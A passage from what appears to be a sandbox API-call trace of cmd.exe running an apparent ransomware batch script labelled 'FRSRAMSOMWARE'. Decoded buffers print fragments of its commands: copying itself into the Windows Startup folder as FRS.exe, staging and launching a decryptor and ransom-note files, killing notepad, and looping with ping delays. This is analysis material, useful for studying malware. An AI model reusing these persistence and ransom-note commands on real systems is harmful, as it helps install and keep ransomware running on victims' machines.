dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0109.753] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0109.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0109.753] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.753] GetFileType (hFile=0x260) returned 0x1 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0109.753] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0109.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0109.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0109.753] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.754] GetFileType (hFile=0x260) returned 0x1 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0109.754] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0109.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0109.754] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.754] GetFileType (hFile=0x260) returned 0x1 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0109.754] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0109.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0109.754] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.754] GetFileType (hFile=0x260) returned 0x1 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0109.754] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0109.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0109.754] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.754] GetFileType (hFile=0x260) returned 0x1 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0109.754] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0109.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0109.754] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.754] GetFileType (hFile=0x260) returned 0x1 [0109.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0109.755] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0109.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0109.755] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.755] GetFileType (hFile=0x260) returned 0x1 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0109.755] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0109.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0109.755] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.755] GetFileType (hFile=0x260) returned 0x1 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0109.755] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0109.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0109.755] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.755] GetFileType (hFile=0x260) returned 0x1 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0109.755] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0109.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0109.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0109.755] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.755] GetFileType (hFile=0x260) returned 0x1 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0109.756] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0109.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0109.756] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.756] GetFileType (hFile=0x260) returned 0x1 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0109.756] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0109.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0109.756] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.756] GetFileType (hFile=0x260) returned 0x1 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0109.756] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0109.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0109.756] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.756] GetFileType (hFile=0x260) returned 0x1 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0109.756] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0109.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0109.756] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.756] GetFileType (hFile=0x260) returned 0x1 [0109.756] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0109.756] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0109.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0109.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0109.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0109.757] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.757] GetFileType (hFile=0x260) returned 0x1 [0109.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0109.757] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0109.757] SetFilePointer (in: hFile=0x260, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0109.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0109.757] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0109.757] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.757] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0109.757] _get_osfhandle (_FileHandle=0) returned 0x24 [0109.757] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0109.758] SetConsoleInputExeNameW () returned 0x1 [0109.758] GetConsoleOutputCP () returned 0x1b5 [0109.758] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0109.758] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.758] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0109.758] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0109.758] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0109.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0109.758] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0109.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0109.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0109.758] GetFileType (hFile=0x260) returned 0x1 [0109.758] _get_osfhandle (_FileHandle=3) returned 0x260 [0109.758] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0109.758] _tell (_FileHandle=3) returned 2512 [0109.758] _close (_FileHandle=3) returned 0 [0109.759] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0109.759] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0109.759] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0109.759] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0109.759] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0109.759] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0109.759] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0109.759] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0109.759] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0109.759] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0109.759] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0109.759] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0109.759] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0109.759] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0109.759] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0109.759] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0109.759] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0109.759] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0109.759] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0109.759] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0109.759] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0109.759] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0109.759] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0109.759] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0109.759] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0109.759] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0109.759] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0109.759] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0109.759] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0109.759] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0109.759] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0109.759] _wcsicmp (_String1="ping", _String2="START") returned -3 [0109.759] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0109.759] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0109.759] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0109.759] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0109.759] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0109.759] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0109.759] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0109.759] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0109.759] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0109.759] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0109.759] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0109.759] SetErrorMode (uMode=0x0) returned 0x0 [0109.759] SetErrorMode (uMode=0x1) returned 0x0 [0109.759] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0109.759] SetErrorMode (uMode=0x0) returned 0x1 [0109.759] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.760] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.760] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.760] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.760] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0109.760] GetLastError () returned 0x2 [0109.760] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.760] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a130 [0109.760] FindClose (in: hFindFile=0xd5a130 | out: hFindFile=0xd5a130) returned 1 [0109.760] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0109.760] GetLastError () returned 0x2 [0109.760] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59b30 [0109.760] FindClose (in: hFindFile=0xd59b30 | out: hFindFile=0xd59b30) returned 1 [0109.760] GetFileType (hFile=0x28) returned 0x2 [0109.760] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0109.760] _dup (_FileHandle=1) returned 3 [0109.760] _close (_FileHandle=1) returned 0 [0109.760] _wcsicmp (_String1="nul", _String2="con") returned 11 [0109.760] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0109.761] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0109.761] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0109.761] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0109.761] SetErrorMode (uMode=0x0) returned 0x0 [0109.761] SetErrorMode (uMode=0x1) returned 0x0 [0109.761] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", 